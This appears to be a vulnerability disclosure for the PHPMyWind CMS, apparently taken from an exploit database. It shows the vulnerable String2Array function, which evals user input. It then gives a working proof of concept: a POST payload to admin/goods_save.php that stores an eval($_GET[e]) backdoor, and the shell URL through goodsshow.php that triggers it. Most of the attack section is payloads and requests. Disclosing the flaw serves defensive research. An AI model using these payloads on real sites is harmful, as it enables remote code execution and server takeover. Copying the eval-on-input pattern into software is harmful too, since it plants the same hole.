<ul><li>/include/common.func.php</li></ul><pre class="">/* string to array */
if(!function_exists('String2Array'))
{
    function String2Array($data)
    {
        if($data == '') return array();
        // $data is interpolated directly into PHP source and executed:
        // any user-controlled content that reaches here becomes code.
        @eval("\$array = $data;");
        return $array;
    }
}
</pre><p>The <code>$data</code> variable is passed straight into <code>eval</code>. When the submitted <code>$data</code> is:</p><pre class="">111|222{${phpinfo()}}</pre><p>the PHP statement that gets executed is:</p><pre class="">@eval("$array = array("1"=>"111|222{${phpinfo()}}","2"=>"");;")</pre><p>The page returns:</p><p><img alt="3E345D6A-1A9E-4B51-9770-ADEEFB04CFC9.png" src="https://images.seebug.org/@/uploads/1434594139629-3E345D6A-1A9E-4B51-9770-ADEEFB04CFC9.png" data-image-size="628,390"></p><p>This proves the vulnerability exists.</p><p>Log in with an account that is allowed to publish articles;</p><p>POST data:</p><pre class="">classid=12&typeid=10&attrvalue[]=111|222{${eval($_GET[e])}}&attrid[]=1&attrid[]=2&checkinfo=true&action=add</pre><p>to the URL:</p><pre class="">http://10.211.55.3/phpmywind/admin/goods_save.php</pre><p>The record is created with id 38;</p><p><img alt="8DD7EF21-8F04-46EC-A1B5-1C9DFEFA8CD7.png" src="https://images.seebug.org/@/uploads/1434594188966-8DD7EF21-8F04-46EC-A1B5-1C9DFEFA8CD7.png" data-image-size="811,171"></p><p>Shell URL:</p><pre class="">http://10.211.55.3/phpmywind/goodsshow.php?cid=12&tid=10&id=38&e=phpinfo();</pre><p><img alt="824AC4F3-7298-488A-A66E-A7813F47071D.png" src="https://images.seebug.org/@/uploads/1434594195950-824AC4F3-7298-488A-A66E-A7813F47071D.png" data-image-size="766,469"></p>